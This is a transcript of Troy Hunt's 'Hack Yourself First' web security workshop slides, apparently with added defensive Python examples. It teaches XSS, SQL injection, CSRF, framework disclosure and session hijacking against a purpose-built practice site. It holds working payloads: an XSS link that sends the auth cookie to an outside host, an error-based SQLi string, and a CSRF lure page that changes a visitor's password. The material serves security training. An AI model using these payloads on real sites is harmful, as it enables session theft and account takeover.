Hack Yourself First – Troy Hunt, @troyhunt, troyhunt.com, troyhunt@hotmail.com

Upload: trinhcong

Post on 15-Oct-2018


TRANSCRIPT

Page 1: Hack Yourself First - Cornerstone · Hack Yourself First ... troyhunt.com. troyhunt@hotmail.com. We’re gonna turn you into lean, mean hacking machines! Because if we don’t, these

Hack Yourself First

Troy Hunt @troyhunt

troyhunt@hotmail.com

Page 2:

We’re gonna turn you into lean, mean

hacking machines!

Page 3:

Because if we don’t, these kids are going to hack you

Ryan Cleary, 20 (and his mum)

Jake Davies, 19 (and his mum)

Curtis Gervais, 16, awaiting trial (probably with his mum)

Page 4:

Who are we protecting our assets from?

(Slide plots each group on two axes: hacker competency against hacker resources)

• Bored kids – pocket money
• Super hackers – $10.8B per annum
• Common thieves – can invest where ROI makes sense

Page 5:

Your Hacker Tools for Today

• A Wi-Fi connection
• A mobile device you can configure a proxy on
  – I have a few spares
• Google Chrome
  – Or another browser with good dev tools
• Fiddler – getfiddler.com
  – Or another HTTP proxy like charlesproxy.com

Page 6:

What we’ll be covering

Introduction – 30 mins – 09:00
Discovering risks via the browser – 30 mins – 09:30
Using an HTTP proxy – 30 mins – 10:00
Break – 15 mins – 10:30
XSS – 50 mins – 10:45
SQL injection – 55 mins – 11:35
Lunch – 1 hour – 12:30
Mobile APIs – 60 mins – 13:30
CSRF – 50 mins – 14:30
Break – 15 mins – 15:20
Framework disclosure – 30 mins – 15:35
Session hijacking – 35 mins – 16:05
Wrap up – 20 mins – 16:40
Close – 17:00

Page 7:

Discovering risks via the browser – Exercise 1

Page 8:

Exercise 1 – Chrome developer tools

• Familiarise yourself with the dev tools
  – Elements, network, cookies, console, por… uh, incognito
• Create an account at hackyourselffirst.troyhunt.com

Hacker Challenge 1: Identify three security risks with the registration process

Page 9:

Using an HTTP proxy – Exercise 2

Page 10:

Exercise 2 – Using an HTTP proxy

• Familiarise yourself with Fiddler
  – Watch requests and their headers, review response body and headers, use the composer to reissue requests

Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID

Page 11:

Reflected cross site scripting (XSS) – Exercise 3

Page 12:

Understanding XSS

The search page reflects the query string straight into the markup:

<p>You searched for <%= Request.QueryString["q"] %></p>

A normal request, mysite.com/?q=ferrari, renders as:

<p>You searched for ferrari</p>

A hostile request, mysite.com/?q=<script>alert('Yay XSS!');</script>, renders as:

<p>You searched for <script>alert('Yay XSS!');</script></p>

Page 13:

Some quick XSS tips

• Check the encoding context
  – You encode for HTML differently than for JavaScript
• Check the encoding consistency
  – Often it’s manual and some characters are not encoded
• Play with JavaScript to:
  – Manipulate the DOM, access cookies, load external resources

Page 14:

Exercise 3 – XSS

• Establish the encoding practices on the search page
  – What’s encoded, what’s not, what contexts are encoding
• What can be accessed or manipulated in the DOM

Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site

Page 15:

Exercise 3 solution

http://hackyourselffirst.troyhunt.com/Search?searchTerm=');document.location='http://www.troyhunt.com/?c='%2bdocument.cookie;//

Page 16:

SQL injection (SQLi) – Exercise 4

Page 17:

Understanding SQLi

The id from the query string is concatenated into the SQL text:

var query = "SELECT * FROM Widget WHERE Id = ";
query += Request.Query["id"];

A normal request, mysite.com/?id=1, produces:

SELECT * FROM Widget WHERE Id = 1

A request of mysite.com/?id=foo produces:

SELECT * FROM Widget WHERE Id = foo

Invalid column name 'foo'

Page 18:

Some quick SQLi tips

• Think of SQL commands which disclose structure
  – sys.tables, sys.columns, system commands
• Consider how you’d enumerate through records
  – Select top x rows asc then top 1 rows from that desc
• Write out how you think the query works internally
  – SELECT * FROM Supercar ORDER BY [URL param]
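The concatenation from the previous slide and the ORDER BY query from the last tip, as an added example (not the workshop's code) against a constructed in-memory SQLite table: the vulnerable builder shows why an unknown column name becomes an error-based disclosure, and the safe version binds the value as a parameter and allow-lists the sort column.

```python
import sqlite3

# Constructed in-memory stand-in for the workshop's Supercar table; the
# functions are hypothetical, not the workshop site's own code.
SCHEMA = """
CREATE TABLE Supercar (Id INTEGER PRIMARY KEY, Name TEXT, MakeId INTEGER);
INSERT INTO Supercar VALUES (1, 'Ferrari F40', 1), (2, 'Lamborghini Miura', 2),
                            (3, 'Ferrari 458', 1);
"""


def connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_vulnerable(conn, make_id: str, order_by: str) -> list:
    """Concatenation, as in the slide's `query += Request.Query["id"]`:
    both URL parameters become part of the SQL text."""
    sql = ("SELECT Id, Name FROM Supercar WHERE MakeId = " + make_id
           + " ORDER BY " + order_by)
    return conn.execute(sql).fetchall()


# Identifiers cannot be bound as parameters, so the sort column is allow-listed.
ALLOWED_ORDER = {"Id", "Name"}


def query_safe(conn, make_id: str, order_by: str) -> list:
    """Value goes through a bound parameter; ORDER BY is checked against the
    allow-list, and the error raised names nothing about the schema."""
    if order_by not in ALLOWED_ORDER:
        raise ValueError("unsupported sort column")
    sql = f"SELECT Id, Name FROM Supercar WHERE MakeId = ? ORDER BY {order_by}"
    return conn.execute(sql, (int(make_id),)).fetchall()


def error_message(fn, *args) -> str:
    """What the user would see if the exception reached the page unhandled."""
    try:
        fn(*args)
        return ""
    except (sqlite3.Error, ValueError) as exc:
        return str(exc)


if __name__ == "__main__":
    db = connect()
    print(error_message(query_vulnerable, db, "1", "foo"))  # echoes the column name
    print(error_message(query_safe, db, "1", "foo"))        # unsupported sort column
```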

Page 19:

Exercise 4 – SQLi

• Explore the database using error-based SQLi
  – Construct strings to disclose internal data
  – Cast things to invalid types to disclose via exceptions

Hacker Challenge 4: Discover the version of the DB

Page 20:

Exercise 4 solution

http://hackyourselffirst.troyhunt.com/Make/1?orderby=@@VERSION*1

Page 21:

Mobile APIs – Exercise 5

Page 22:

Understanding mobile APIs

Page 23:

Who are we protecting our APIs from?

(Diagram labels: Attacker · HTTP(S) · Attacker)

Page 24:

Trusting the Fiddler root cert

http://ipv4.fiddler:8888

Page 25:

Some quick mobile API tips

• Look at the HTTP requests for sensitive data
  – Credentials, account info, PII
• Remove the proxy’s root cert and make HTTPS requests
  – Is cert validation actually enabled in the app?
• In your own apps:
  – Parameter tampering, auth bypass, direct object refs

Page 26:

Exercise 5 – Mobile APIs

• Proxy your device through Fiddler or Charles
  – Inspect the traffic of your apps
  – Perform normal activities and monitor requests

Hacker Challenge 5: Find three “things of interest” – doesn’t have to be security related

Page 27:

Cross site request forgery (CSRF) – Exercise 6

Page 28:

Understanding CSRF

POST /Login/Account
Set-Cookie: AuthCookie=XXX…

GET /Path/To/Authenticated/Resource
Cookie: AuthCookie=XXX… ← CSRF here!
Authenticated request!

Page 29:

Some quick CSRF tips

• Establish the request pattern to the target resource
  – What fields are being sent
• Reconstruct the request from your own resource
  – Normally a malicious page
• Lure the user into the malicious resource
  – Usually requires incentivisation
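The server side of the exchange above, as an added example (not the workshop site's code): a hypothetical handler for the change-password request that refuses the forged request even though the browser attached the auth cookie, by checking the Origin header and a session-bound anti-forgery token. Requests are constructed dicts; the field name follows ASP.NET MVC's anti-forgery convention.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Hypothetical handler for the slide's POST /Account/ChangePassword, showing
# the two checks a cookie-authenticated endpoint needs; not the workshop
# site's own code.  Requests are constructed dicts with 'cookies',
# 'headers' and 'form' keys.
SITE_ORIGIN = "https://hackyourselffirst.troyhunt.com"
SERVER_KEY = secrets.token_bytes(32)  # per-process secret for the token MAC


def issue_token(session_id: str) -> str:
    """Synchroniser token bound to the session; the site embeds it in its own
    forms under the field name ASP.NET MVC uses for the same purpose."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def change_password(request: dict) -> tuple:
    session_id = request["cookies"].get("AuthCookie")
    if not session_id:
        return 401, "not authenticated"
    # 1. The browser attaches AuthCookie to any POST aimed at this host, so the
    #    cookie says nothing about which page built the request.  Origin (or
    #    Referer as a fallback) does.
    source = request["headers"].get("Origin") or request["headers"].get("Referer", "")
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    # 2. A page on another origin cannot read the token embedded in this
    #    site's form, so a missing or wrong token means the form was not ours.
    token = request["form"].get("__RequestVerificationToken", "")
    if not hmac.compare_digest(token, issue_token(session_id)):
        return 403, "missing or invalid anti-forgery token"
    form = request["form"]
    if form.get("NewPassword") != form.get("ConfirmPassword"):
        return 400, "passwords do not match"
    return 200, "password changed"


def lure_page_request(session_id: str) -> dict:
    """The request the slide's 'Win an iPhone' page produces: right cookie,
    right fields, but a foreign Origin and no token (constructed)."""
    return {"cookies": {"AuthCookie": session_id},
            "headers": {"Origin": "https://lure.example"},
            "form": {"NewPassword": "hackpword", "ConfirmPassword": "hackpword"}}
```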

Page 30:

Exercise 6 – CSRF

• Mount your own CSRF attack
  – Reproduce a legitimate request
  – Use it to perform a malicious action

Hacker Challenge 6: Change the present user’s password when they load your page

Page 31:

Exercise 6 solution

Page 32:

Exercise 6 solution

<html>
<head><title>Win an iPhone!!!</title></head>
<body style="text-align: center;">
  <h1 style="font-size: 1.7em;">Want to win an iPhone? Of course you do! Click the button below and it's yours!!!</h1>
  <form action="https://hackyourselffirst.troyhunt.com/Account/ChangePassword" method="POST" target="hiddenFrame">
    <input type="hidden" name="NewPassword" value="hackpword" />
    <input type="hidden" name="ConfirmPassword" value="hackpword" />
    <input type="submit" value="I wanna win!" onclick="alert('You won! Click ok and it\'s done')" style="font-size: 2em;" />
  </form>
  <p><img src="iPhone.jpg" style="width: 900px;" /></p>
  <iframe name="hiddenFrame" style="display: none;"></iframe>
</body>
</html>

Page 33:

Framework disclosure – Exercise 7

Page 34:

Understanding framework disclosure risks

Learn of framework vulnerability → Search web for vulnerable sites → Pwn!

Page 35:

Some quick framework disclosure tips

• There are multiple ways the framework is leaked
  – This can differ by web stack
• Different requests can cause different leakage
  – Consider the different ways in which a site may respond
• Also think about other ways disclosure happens
  – Markup structure, naming patterns, etc

Page 36:

Exercise 7 – Framework disclosure

• Discover the internal framework of the site
  – Identify what’s being implicitly leaked
  – Cause the app to leak additional information

Hacker Challenge 7: Identify 3 different ways in which the internal framework is disclosed

Page 37:

Exercise 7 solution

1. Response headers (server, powered by, ASP.NET version, MVC version)
2. Unhandled exception stack trace (includes minor ASP.NET version)
3. Session ID cookie name (ASP.NET_SessionId)
4. Error page for 404 (includes minor ASP.NET version)
5. Elmah
6. HTTP fingerprinting…

Page 38:

HTTP field ordering

Apache 1.3.23
HTTP/1.1 200 OK
Date: Sun, 15 Jun 2003 17:10:49 GMT
Server: Apache/1.3.23
Last-Modified: Thu, 27 Feb 2003…
ETag: "32417-c4-3e5d8a83"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/html

IIS 5.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com
Date: Fri, 01 Jan 1999 20:13:52 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jan 1999…
ETag: W/"e0d362a4c335be1:ae1"
Content-Length: 133

Page 39:

Other fingerprinting indicators

• Forbidden resource
• Improper HTTP version
• Improper protocol
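Header-order fingerprinting from the two responses on the previous slide, as an added example (not the workshop's code): the raw responses are reconstructed from the slide with the truncated Last-Modified timestamps replaced by placeholder values, and the hardening function shows that stripping the Server and ASP.NET version headers (solution item 1) still leaves the ordering (item 6) to identify the server.

```python
# Added example, not the workshop's code.  The two raw responses are
# reconstructed from the slide; the truncated Last-Modified timestamps
# are placeholder values.
APACHE_RAW = (
    "HTTP/1.1 200 OK\r\nDate: Sun, 15 Jun 2003 17:10:49 GMT\r\n"
    "Server: Apache/1.3.23\r\nLast-Modified: Thu, 27 Feb 2003 00:00:00 GMT\r\n"
    'ETag: "32417-c4-3e5d8a83"\r\nAccept-Ranges: bytes\r\nContent-Length: 196\r\n'
    "Connection: close\r\nContent-Type: text/html\r\n\r\n"
)
IIS_RAW = (
    "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n"
    "Content-Location: http://iis.example.com\r\nDate: Fri, 01 Jan 1999 20:13:52 GMT\r\n"
    "Content-Type: text/html\r\nAccept-Ranges: bytes\r\n"
    "Last-Modified: Fri, 01 Jan 1999 00:00:00 GMT\r\n"
    'ETag: W/"e0d362a4c335be1:ae1"\r\nContent-Length: 133\r\n\r\n'
)
# Relative order in which each server emits its headers (from the slide).
SIGNATURES = {
    "Apache 1.3": ["date", "server", "last-modified", "etag", "accept-ranges",
                   "content-length", "connection", "content-type"],
    "IIS 5.0": ["server", "content-location", "date", "content-type",
                "accept-ranges", "last-modified", "etag", "content-length"],
}
# Headers that name the stack outright (item 1 of the solution slide).
DISCLOSURE_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version"}


def parse_headers(raw: str) -> list:
    """[(name, value), ...] in wire order; the order itself is the signal."""
    head = raw.split("\r\n\r\n", 1)[0]
    return [tuple(p.strip() for p in line.split(":", 1))
            for line in head.split("\r\n")[1:] if ":" in line]


def _in_order(needle: list, hay: list) -> bool:
    it = iter(hay)
    return all(h in it for h in needle)  # subsequence check


def fingerprint(headers: list) -> str:
    """Best-matching server judged by header ordering alone."""
    names = [n.lower() for n, _ in headers]
    best, best_score = "unknown", 0
    for server, sig in SIGNATURES.items():
        present = [h for h in sig if h in names]
        if len(present) > best_score and _in_order(present, names):
            best, best_score = server, len(present)
    return best


def strip_disclosure_headers(headers: list) -> list:
    """The usual hardening step: remove Server and the ASP.NET version headers."""
    return [(n, v) for n, v in headers if n.lower() not in DISCLOSURE_HEADERS]
```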

Page 40:

Session hijacking – Exercise 8

Page 41:

Understanding session hijacking

POST /Login/Account

Set-Cookie: AuthCookie=XXX…

Attacker steals the cookie

Attacker issues “authenticated” request with the cookie

Page 42:

Some quick session hijacking tips

• Persistence over HTTP can be done multiple ways
  – Cookie, URL
• Session or auth ID can be obtained multiple ways
  – Insecure transport, referrer, stored in exceptions, XSS
• Factors that limit hijacking
  – Short duration expiry, keyed to client device / IP
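The defensive side of these tips, as an added example (not the workshop's code): an audit of the attributes on an auth cookie like the slide's AuthCookie (Secure against insecure transport, HttpOnly against theft via XSS, a short Max-Age), and a hypothetical session store that applies the two limiting factors, short expiry and binding the token to the client. Cookie strings, tokens and IP addresses are constructed.

```python
import time
from http.cookies import SimpleCookie

# Added example, not the workshop's code: an audit of the attributes on an
# auth cookie such as the slide's AuthCookie, plus an in-memory session
# store that applies short expiry and client binding.  Cookie strings and
# IP addresses are constructed.


def audit_set_cookie(header: str, max_age_limit: int = 1800) -> list:
    """Return the weaknesses in a Set-Cookie header that make hijacking easier."""
    jar = SimpleCookie()
    jar.load(header)
    findings = []
    for name, morsel in jar.items():
        if not morsel["secure"]:
            findings.append(f"{name}: no Secure flag, exposed on insecure transport")
        if not morsel["httponly"]:
            findings.append(f"{name}: no HttpOnly flag, readable via document.cookie after XSS")
        if morsel["samesite"].lower() not in ("lax", "strict"):
            findings.append(f"{name}: no SameSite attribute")
        if not morsel["max-age"] or int(morsel["max-age"]) > max_age_limit:
            findings.append(f"{name}: no short expiry (Max-Age missing or > {max_age_limit}s)")
    return findings


SESSIONS = {}  # token -> {"ip", "ua", "expires"}; stand-in for a session store


def create_session(token: str, client_ip: str, user_agent: str, ttl: int = 1800, now=None):
    now = time.time() if now is None else now
    SESSIONS[token] = {"ip": client_ip, "ua": user_agent, "expires": now + ttl}


def validate_session(token: str, client_ip: str, user_agent: str, now=None) -> str:
    """'ok', or the reason a presented cookie is refused.  Binding to IP can
    break legitimate mobile users who change networks; binding to the
    user agent alone is weaker but safer to deploy."""
    now = time.time() if now is None else now
    rec = SESSIONS.get(token)
    if rec is None:
        return "unknown session"
    if now > rec["expires"]:
        return "expired"
    if (rec["ip"], rec["ua"]) != (client_ip, user_agent):
        return "client mismatch: token presented from a different device"
    return "ok"
```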

Page 43:

Exercise 8 – Session hijacking

• Mount a session hijacking attack
  – Identify how auth is being persisted
  – Obtain the auth token using a vuln in the app

Hacker Challenge 8: Use an XSS risk to obtain the auth token and recreate the session in another browser